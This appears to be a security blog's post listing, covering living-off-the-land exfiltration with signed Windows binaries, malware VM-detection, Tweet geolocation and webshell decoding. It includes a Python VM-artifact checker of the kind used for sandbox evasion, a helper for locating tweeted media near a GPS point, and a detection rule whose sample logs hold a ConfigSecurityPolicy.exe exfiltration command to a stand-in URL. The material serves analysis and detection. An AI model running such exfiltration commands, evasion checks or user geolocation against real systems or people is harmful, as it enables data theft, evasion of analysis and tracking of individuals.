
[part 2]

When it comes to data exfiltration, creativity and thinking outside the box matter most. As a reminder: the term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Graeber to describe the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts.

This time, I managed to find another unexpected way using the WCF Data Service Client Utility (DataSvcUtil.exe). DataSvcUtil.exe is a command-line tool provided by…



To evade detection and analysis by security researchers, malware may check whether it is running inside a virtualized environment such as a VirtualBox or VMware virtual machine. If these checks indicate that it is being run in a VM, the malware simply does not run and, in some cases, deletes itself to prevent analysis.

A common approach to analysing potentially malicious software is dynamic analysis: the binary is executed in an analysis environment, usually a Virtual Machine (VM), and its behaviour in the system is inspected.

Many Virtual Machine Environments (VMEs) are easily detectable through the artifacts they leave in:

  • File System
  • Services
  • Hardware Information
  • Registry…
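As an added example (not code from the original post), here are the artifact categories above turned into a check in Python. The artifact lists are an illustrative assumption, not a complete catalogue of what VirtualBox and VMware guest additions leave behind; the scoring function works on a snapshot dict so it can be tested offline, and the collector only runs on Windows.

```python
import os
import platform
import subprocess

# Well-known guest-additions artifacts of VirtualBox and VMware. These lists are an
# assumption for illustration; real samples carry far longer lists.
VM_FILES = [
    r"C:\Windows\System32\drivers\VBoxMouse.sys",
    r"C:\Windows\System32\drivers\VBoxGuest.sys",
    r"C:\Windows\System32\drivers\VBoxSF.sys",
    r"C:\Windows\System32\drivers\vmhgfs.sys",
    r"C:\Windows\System32\drivers\vmmouse.sys",
]
VM_SERVICES = ["VBoxService", "VMTools", "vmvss"]
VM_REGISTRY_KEYS = [
    r"SOFTWARE\Oracle\VirtualBox Guest Additions",
    r"SOFTWARE\VMware, Inc.\VMware Tools",
    r"HARDWARE\ACPI\DSDT\VBOX__",
]
VM_VENDOR_STRINGS = ["vmware", "virtualbox", "innotek gmbh"]
VM_MAC_PREFIXES = ["08:00:27", "00:05:69", "00:0c:29", "00:50:56"]  # VirtualBox / VMware OUIs


def score_snapshot(snap):
    """Match a snapshot dict {files, services, registry_keys, vendor, macs} against the
    artifact lists. Returns (hits, verdict); hits is a list of (category, artifact)."""
    hits = []
    files = {f.lower() for f in VM_FILES}
    hits += [("file", f) for f in snap.get("files", []) if f.lower() in files]
    services = {s.lower() for s in VM_SERVICES}
    hits += [("service", s) for s in snap.get("services", []) if s.lower() in services]
    keys = {k.lower() for k in VM_REGISTRY_KEYS}
    hits += [("registry", k) for k in snap.get("registry_keys", []) if k.lower() in keys]
    vendor = snap.get("vendor", "").lower()
    hits += [("hardware", v) for v in VM_VENDOR_STRINGS if v in vendor]
    for mac in snap.get("macs", []):
        if mac.lower().replace("-", ":")[:8] in VM_MAC_PREFIXES:
            hits.append(("hardware", mac))
    return hits, ("vm" if hits else "bare-metal")


def collect_snapshot():
    """Gather the same categories from the live host. Windows only; elsewhere it returns
    an empty snapshot so the module stays importable on an analyst's Linux box."""
    snap = {"files": [], "services": [], "registry_keys": [], "vendor": "", "macs": []}
    if platform.system() != "Windows":
        return snap
    import winreg
    snap["files"] = [f for f in VM_FILES if os.path.exists(f)]
    for key in VM_REGISTRY_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key))
            snap["registry_keys"].append(key)
        except OSError:
            pass
    run = lambda *cmd: subprocess.run(cmd, capture_output=True, text=True).stdout
    snap["vendor"] = run("wmic", "computersystem", "get", "manufacturer,model")
    snap["services"] = [ln.split(":", 1)[1].strip()
                        for ln in run("sc", "query", "state=", "all").splitlines()
                        if ln.strip().upper().startswith("SERVICE_NAME")]
    snap["macs"] = [ln.split(",")[0].strip('"')
                    for ln in run("getmac", "/fo", "csv", "/nh").splitlines() if ln.strip()]
    return snap


# Constructed snapshot of a VirtualBox guest, used as the offline sample input.
SAMPLE_VBOX_GUEST = {
    "files": [r"C:\Windows\System32\drivers\VBoxMouse.sys", r"C:\Windows\System32\drivers\ntfs.sys"],
    "services": ["VBoxService", "Dhcp", "EventLog"],
    "registry_keys": [r"SOFTWARE\Oracle\VirtualBox Guest Additions"],
    "vendor": "Manufacturer  Model\ninnotek GmbH  VirtualBox\n",
    "macs": ["08-00-27-4B-1C-9A"],
}

if __name__ == "__main__":
    for category, artifact in score_snapshot(SAMPLE_VBOX_GUEST)[0]:
        print(category, artifact)
    print(score_snapshot(collect_snapshot())[1])
```

Each category is an independent signal; a sandbox that hides one of them (renamed drivers, patched vendor strings) usually still exposes another, which is why samples check several before deciding not to run.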



When working with Tweet data, there are two classes of geographical metadata that can be searched to find media items tagged with a specific GPS location:

  • Tweet location — Available when the user shares their location at the time of the Tweet.
  • Account location — Based on the ‘home’ location provided by the user in their public profile. This is a free-form character field and may or may not contain metadata that can be geo-referenced.

Important notes: geographical coordinates are provided in [LONG, LAT] order. The one exception is the deprecated ‘geo’ attribute, which has the reverse [LAT, LONG] order. …
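As an added example (not code from the original post), a small Python helper that pulls both classes of location out of Tweet JSON and searches for media items near a GPS point. It reads the `coordinates`, deprecated `geo`, `place.bounding_box` and `user.location` fields and handles the [LONG, LAT] versus [LAT, LONG] difference noted above; the sample tweets, IDs and URLs are constructed, and the haversine radius search is my own addition.

```python
import json
import math

# Constructed sample tweets (not real Twitter data); only the fields read below are present.
SAMPLE_TWEETS = json.loads(r"""[
 {"id_str": "1", "coordinates": {"type": "Point", "coordinates": [-43.1729, -22.9068]},
  "geo": {"type": "Point", "coordinates": [-22.9068, -43.1729]},
  "user": {"location": "Rio de Janeiro, Brazil"},
  "entities": {"media": [{"media_url_https": "https://example.invalid/1.jpg"}]}},
 {"id_str": "2", "coordinates": null,
  "geo": {"type": "Point", "coordinates": [-22.9068, -43.1729]},
  "user": {"location": "somewhere"},
  "entities": {"media": [{"media_url_https": "https://example.invalid/2.jpg"}]}},
 {"id_str": "3", "coordinates": null, "geo": null,
  "place": {"full_name": "São Paulo, Brazil", "bounding_box": {"type": "Polygon",
     "coordinates": [[[-46.8, -24.0], [-46.4, -24.0], [-46.4, -23.4], [-46.8, -23.4]]]}},
  "user": {"location": ""},
  "entities": {"media": [{"media_url_https": "https://example.invalid/3.jpg"}]}},
 {"id_str": "4", "coordinates": null, "geo": null, "user": {"location": "Brasil"}, "entities": {}}
]""")


def tweet_location(tweet):
    """Return (lat, lon, source) for the Tweet-location class, or None when the user shared nothing.
    Preference: 'coordinates' (GeoJSON [LONG, LAT]) > deprecated 'geo' ([LAT, LONG]) > place bounding box."""
    c = tweet.get("coordinates")
    if c and c.get("coordinates"):
        lon, lat = c["coordinates"]                 # GeoJSON order: [LONG, LAT]
        return lat, lon, "coordinates"
    g = tweet.get("geo")
    if g and g.get("coordinates"):
        lat, lon = g["coordinates"]                 # deprecated 'geo': reversed, [LAT, LONG]
        return lat, lon, "geo"
    p = tweet.get("place")
    if p and p.get("bounding_box"):
        ring = p["bounding_box"]["coordinates"][0]  # polygon ring of [LONG, LAT] points
        lat = sum(pt[1] for pt in ring) / len(ring)
        lon = sum(pt[0] for pt in ring) / len(ring)
        return lat, lon, "place"                    # centroid: coarse, city-level only
    return None


def account_location(tweet):
    """The account-location class: free-form profile text, not guaranteed to geo-reference."""
    loc = (tweet.get("user") or {}).get("location") or ""
    return loc.strip() or None


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two (lat, lon) points."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def media_near(tweets, lat, lon, radius_km):
    """IDs (and which field located them) of tweets carrying media within radius_km of (lat, lon)."""
    found = []
    for t in tweets:
        if not (t.get("entities") or {}).get("media"):
            continue
        loc = tweet_location(t)
        if loc and haversine_km(lat, lon, loc[0], loc[1]) <= radius_km:
            found.append((t["id_str"], loc[2]))
    return found


if __name__ == "__main__":
    for t in SAMPLE_TWEETS:
        print(t["id_str"], tweet_location(t), account_location(t))
    print(media_near(SAMPLE_TWEETS, -22.9068, -43.1729, 50))
```

Reading `geo` with the GeoJSON assumption would swap the axes and place tweet 2 in the middle of the Indian Ocean, which is the usual symptom of mixing the two orders.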



First, you need to create an account on DigitalOcean; when you create the account, you will receive US$100 in credits to spend:



The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Graeber to describe the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can find a lot of tricks at https://github.com/LOLBAS-Project/LOLBAS (Living Off The Land Binaries And Scripts, covering both LOLBins and LOLScripts).

My first discovery was a simple way to abuse the Microsoft Windows Defender utility ConfigSecurityPolicy.exe (“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe”) to exfiltrate data.
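The defensive side of both posts (this one on ConfigSecurityPolicy.exe and the part 2 post on DataSvcUtil.exe), as an added example that is not code from the original posts: a small rule in Python that flags either binary when it is launched with a URL on its command line, run over constructed process-creation records. The `key=value|key=value` line format, the file paths and the URLs are all constructed for the example; DataSvcUtil.exe legitimately takes a `/uri:` OData endpoint, so that hit is graded "review" rather than "alert" and should be correlated with the parent process and the host's role.

```python
import ntpath
import re

# Signed Microsoft binaries the two posts show being abused for upload, with the severity
# assigned when a URL appears on their command line (assumption: tune for your estate).
WATCHED = {"configsecuritypolicy.exe": "alert", "datasvcutil.exe": "review"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
LOCAL_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"']+")


def parse_event(line):
    """Parse one 'key=value|key=value' process-creation record (constructed format for the example)."""
    return dict(kv.split("=", 1) for kv in line.split("|") if "=" in kv)


def evaluate(event):
    """Return an alert dict when a watched image is started with a URL on its command line, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    level = WATCHED.get(image)
    if level is None:
        return None
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    if not urls:
        return None
    # Local paths on the same command line are the candidate exfiltrated files; drop the image itself.
    files = [p for p in LOCAL_PATH_RE.findall(cmd) if ntpath.basename(p).lower() != image]
    return {
        "level": level,
        "image": image,
        "parent": ntpath.basename(event.get("ParentImage", "")).lower(),
        "urls": urls,
        "files": files,
    }


def detect(lines):
    """Run the rule over raw log lines and return the alerts in log order."""
    return [a for a in (evaluate(parse_event(ln)) for ln in lines) if a]


# Constructed sample records (not real telemetry). Line 1 models the Defender utility being handed a
# local file and a remote URL; line 2 is the same binary run normally; line 3 models DataSvcUtil.exe
# pointed at an attacker-controlled endpoint; line 4 is an unrelated process with a URL.
SAMPLE_LOG = [
    r"EventID=1|Image=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe"
    r"|ParentImage=C:\Windows\System32\cmd.exe"
    r"|CommandLine=ConfigSecurityPolicy.exe C:\Users\bob\Documents\payroll.xlsx https://example.invalid/drop",
    r"EventID=1|Image=C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe"
    r"|ParentImage=C:\Program Files\Windows Defender\MsMpEng.exe|CommandLine=ConfigSecurityPolicy.exe",
    r"EventID=1|Image=C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\DataSvcUtil.exe"
    r"|ParentImage=C:\Windows\System32\cmd.exe"
    r"|CommandLine=DataSvcUtil.exe /out:C:\Users\bob\AppData\Local\Temp\x.cs /uri:https://example.invalid/collect",
    r"EventID=1|Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=notepad.exe https://example.invalid",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Because both binaries are signed by Microsoft and live in trusted paths, an allow-list of signed images will not stop them; the command line, parent process and outbound connection are what you have to look at.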



While updating my Pastebin parser, I found a very interesting PHP webshell and decided to decode it out of curiosity. For this kind of analysis I always recommend CyberChef, basically a Swiss army knife for things like cryptography, encoding, compression and data analysis, and it is the only thing you will need to reproduce this article and apply it to other obfuscations, encodings and related malware analysis.

CyberChef https://github.com/gchq/CyberChef


The Win32_TemperatureProbe WMI class represents the properties of a temperature sensor (electronic thermometer).

command: wmic /namespace:\\root\WMI path MSAcpi_ThermalZoneTemperature get CurrentTemperature

Most of the information that the Win32_TemperatureProbe WMI class provides comes from SMBIOS. Real-time readings for the CurrentReading property cannot be extracted from SMBIOS tables. For this reason, current implementations of WMI do not populate the CurrentReading property. The CurrentReading property’s presence is reserved for future use.

Win32_TemperatureProbe has 35 properties:

rax+rax

reverse engineering and malware tales. LinkedIn: @isdebuggerpresent
